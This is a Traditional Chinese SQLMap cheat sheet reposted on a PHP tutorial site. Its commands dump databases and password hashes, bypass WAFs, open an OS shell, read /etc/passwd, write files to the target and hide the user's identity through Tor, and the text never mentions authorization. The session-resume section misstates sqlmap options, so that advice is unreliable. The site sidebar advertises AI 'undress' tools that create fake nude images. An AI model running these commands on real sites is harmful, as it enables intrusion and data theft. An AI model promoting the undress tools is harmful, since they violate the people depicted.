SQLMap 備忘單:自動 SQL 注入快速指南
作者:Trix Cyrus
什麼是 SQLMap?
SQLMap是一個開源滲透測試工具,用於偵測和利用網路應用程式中的SQL注入漏洞。它支援各種資料庫系統,如 MySQL、PostgreSQL、Oracle、Microsoft SQL Server 等。
基本用法
要開始使用 SQLMap,您可以透過提供目標 URL 以最簡單的形式運行它:
sqlmap -u "http://example.com/index.php?id=1"
此指令掃描目標 URL 是否有 SQL 注入漏洞。
1。偵測漏洞
使用以下選項執行基本的漏洞掃描並自動偵測 SQL 注入點:
sqlmap -u "http://example.com/index.php?id=1" --dbs
--dbs:如果發現漏洞,列出目標伺服器上所有可用的資料庫。
2。指定 POST 請求
對於需要 POST 請求的目標(通常在登入表單中),您可以指定以下資料:
sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
3。繞過 WAF 和過濾器
為了逃避 Web 應用程式防火牆 (WAF),SQLMap 包含有效負載混淆技術:
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
--tamper:使用篡改腳本來逃避過濾器。範例:space2comment、charencode。
4。擷取資料庫、表格和欄位
若要取得目標系統上的資料庫清單:
sqlmap -u "http://example.com/index.php?id=1" --dbs
辨識資料庫後,擷取其表:
sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
要從特定表中取得欄位:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
5。轉儲資料
轉儲表的內容是 SQLMap 最有用的功能之一。例如,轉儲特定表中的所有資料:
sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
6。枚舉資料庫使用者和密碼
SQLMap 還可以用於枚舉資料庫用戶,甚至破解雜湊密碼:
sqlmap -u "http://example.com/index.php?id=1" --users sqlmap -u "http://example.com/index.php?id=1" --passwords
7。存取作業系統
在某些情況下,SQLMap可以用來在作業系統上執行指令,特別是當資料庫使用者有進階權限時:
sqlmap -u "http://example.com/index.php?id=1" --os-shell
這將提供一個互動式 shell,您可以在其中在目標系統上執行命令。
8。文件上傳與讀取
您也可以從目標系統讀取檔案或上傳惡意檔案(如果允許):
sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd" sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
9。使用 Tor 進行匿名
要隱藏您的身份,您可以透過 Tor 網路執行 SQLMap:
sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
--tor:啟用 Tor。
--check-tor:驗證是否透過 Tor 建立連線。
10。保存和恢復會話
SQLMap 讓您可以使用 --session 選項來儲存和復原進度:
sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
稍後,您可以透過以下方式恢復相同會話:
sqlmap -r your_session_name
11。詳細模式
要查看有關 SQLMap 正在執行的操作的詳細資訊:
sqlmap -u "http://example.com/index.php?id=1" -v 3
-v 選項控制詳細程度(等級從 0 到 6,其中 6 顯示所有詳細資訊)。
- 自動掃描多個目標
SQLMap 支援掃描儲存在檔案中的多個 URL:
sqlmap -m urls.txt --batch
--batch:使用預設選項自動回答所有提示,對於自動掃描很有用。
也可以使用 --risk=3 和 --level=5 提前掃描
您可以使用此備忘單向讀者介紹 SQLMap 的基本命令,並協助他們開始 SQL 注入測試。
~TrixSec
以上是SQLMap 備忘單:自動 SQL 注入快速指南的詳細內容。更多資訊請關注PHP中文網其他相關文章!
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
熱工具
記事本++7.3.1
好用且免費的程式碼編輯器
SublimeText3漢化版
中文版,非常好用
禪工作室 13.0.1
強大的PHP整合開發環境
Dreamweaver CS6
視覺化網頁開發工具
SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)
Python vs.C:申請和用例
Apr 12, 2025 am 12:01 AM
Python适合数据科学、Web开发和自动化任务,而C 适用于系统编程、游戏开发和嵌入式系统。Python以简洁和强大的生态系统著称,C 则以高性能和底层控制能力闻名。
Python:遊戲,Guis等
Apr 13, 2025 am 12:14 AM
Python在遊戲和GUI開發中表現出色。 1)遊戲開發使用Pygame,提供繪圖、音頻等功能,適合創建2D遊戲。 2)GUI開發可選擇Tkinter或PyQt,Tkinter簡單易用,PyQt功能豐富,適合專業開發。
2小時的Python計劃:一種現實的方法
Apr 11, 2025 am 12:04 AM
2小時內可以學會Python的基本編程概念和技能。 1.學習變量和數據類型,2.掌握控制流(條件語句和循環),3.理解函數的定義和使用,4.通過簡單示例和代碼片段快速上手Python編程。
Python與C:學習曲線和易用性
Apr 19, 2025 am 12:20 AM
Python更易學且易用,C 則更強大但複雜。 1.Python語法簡潔,適合初學者,動態類型和自動內存管理使其易用,但可能導致運行時錯誤。 2.C 提供低級控制和高級特性,適合高性能應用,但學習門檻高,需手動管理內存和類型安全。
您可以在2小時內學到多少python?
Apr 09, 2025 pm 04:33 PM
兩小時內可以學到Python的基礎知識。 1.學習變量和數據類型,2.掌握控制結構如if語句和循環,3.了解函數的定義和使用。這些將幫助你開始編寫簡單的Python程序。
Python和時間:充分利用您的學習時間
Apr 14, 2025 am 12:02 AM
要在有限的時間內最大化學習Python的效率,可以使用Python的datetime、time和schedule模塊。 1.datetime模塊用於記錄和規劃學習時間。 2.time模塊幫助設置學習和休息時間。 3.schedule模塊自動化安排每週學習任務。
Python:自動化,腳本和任務管理
Apr 16, 2025 am 12:14 AM
Python在自動化、腳本編寫和任務管理中表現出色。 1)自動化:通過標準庫如os、shutil實現文件備份。 2)腳本編寫:使用psutil庫監控系統資源。 3)任務管理:利用schedule庫調度任務。 Python的易用性和豐富庫支持使其在這些領域中成為首選工具。
Python:探索其主要應用程序
Apr 10, 2025 am 09:41 AM
Python在web開發、數據科學、機器學習、自動化和腳本編寫等領域有廣泛應用。 1)在web開發中,Django和Flask框架簡化了開發過程。 2)數據科學和機器學習領域,NumPy、Pandas、Scikit-learn和TensorFlow庫提供了強大支持。 3)自動化和腳本編寫方面,Python適用於自動化測試和系統管理等任務。
